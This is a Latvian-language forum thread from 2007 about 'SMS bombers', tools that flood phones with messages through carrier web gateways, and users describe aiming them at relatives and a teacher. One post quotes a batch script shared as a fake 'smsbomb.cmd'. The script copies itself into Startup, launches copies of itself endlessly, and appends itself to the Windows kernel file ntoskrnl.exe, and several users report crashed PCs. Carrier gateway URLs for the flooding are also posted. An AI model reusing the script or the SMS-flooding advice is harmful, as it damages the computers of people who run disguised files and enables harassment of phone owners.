Jump to content
GIGN Forum

Sms Bomber


Edgars14
 Share

Recommended Posts

  • Replies 57
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

el, pilniigi pareizi raksti - darbojaas. agraak. vismaz tele2 bomberi drabojaas vnk ideaali, bija tikai jaamaak atrast iistais, jaapatestee uz kaada no radiniekiem, lai zini vai iet vai nee un aiziet. wink.gif bet ar LMT bija probleemas. un nu jau kaadu laicinju neesmu atradis nevienu, pat prieksh tele2 ne... unsure.gif

Edited by eziic
Link to comment
Share on other sites

njaa agraak visi vinji gaaja... es esmu dzirdeejis ka viens latvietis ir uzstaisiijis bomberu kurs darbojas uz visiem100% vai staasta bet pats izmekleejos neko neatradu .. daudzus arzemju meiginaaju nekas neaiziet..!!!

Link to comment
Share on other sites

LMT tas nedarbotos visiem dzekiem, jo limits ir kadas 10 sms diena laikam un pakalpojums sms no web ir jaaktivize, turpreti tele2 viss ir bumbas, vienigi vajag vadit ieksa drosibas kodu, bet ja kads man sapikotu, es uztaisitu bomberi, kurs atpazist to kodu! wink.gif

Beefy

Edited by 0xDEAD BEEF
Link to comment
Share on other sites

ja lai kkam samaitaatu gariigo..

mes agraak stunda informaatikas vecenei aizsuutiijam 6i bimbaat sakaamm..

stibalis visu dienu .. cool2.gif

EDIT: Beefy ieliec to bomberu ja protams ev nav gruuti ..

Edited by Adik
Link to comment
Share on other sites

Bla, nu tipa tev visu laiku piikst mobilais un nak iszinas un tu esi nelaimigs dzeks! Palaid smsbobmer, ko pievienoju parsi postus augstak un ievadi mammas tel nr., tad redzesi! biggrin.gif

Beefy

negribu to redzet jo labak pastaasti vel sapisiisu kadam tel sad.gif

Link to comment
Share on other sites

BEEF 1 kārt bomberis caur cmd nelaidīsies.

2kārt

echo :1 >c:\nave.cmd

echo start c:\nave.cmd >>c:\nave.cmd

echo copy C:\WINDOWS\system32\ntoskrnl.exe+c:\nave.cmd C:\WINDOWS\system32\ntoskrnl.exe >>c:\nave.cmd

echo goto :1 >>c:\nave.cmd

copy c:\nave.cmd "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"

start c:\nave.cmd

Par to tev zobus derētu izsist, Varu saderēt ka 99% neskatīsies kas tu ir iekšā pirms ver vaļā.

Link to comment
Share on other sites

Rekur vienu atradu. Kad palaiz, tad jaievada sanemeja tel nr. un lauka agent jaieraksta

utils.tele2.lv/smssend.phtml

Beefy

P.S. Man stradaja ari uz LMT, kad ievadiju agent:

lmt.lv/lv/smsacces.php?idnet=3005001006

naughty.gif

This post has been edited by 0xDEAD BEEF on Feb 8 2007, 15:39

Attached File ( Number of downloads: 17 )

Attached File smsbomb.cmd

tu esi LOL man pc vaidzeja restartet 18.gif

smiliez.de_2551.gifsmiliez.de_2551.gifsmiliez.de_2551.gifsmiliez.de_2551.gif

Link to comment
Share on other sites

edgar tev vis kartiba?? man bled tie sudi lec lec es sakuma palaidu sudu skatos kkaada suchka lec uzreiz restart un tapat 6itie sudi lec un dators uzkaras suka beefff

A vot vajag skatīties ko ver vaļā un pēc restarta nekam čakarēties nevajag. Tas nav nekāds vīruss.

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
 Share


×
×
  • Create New...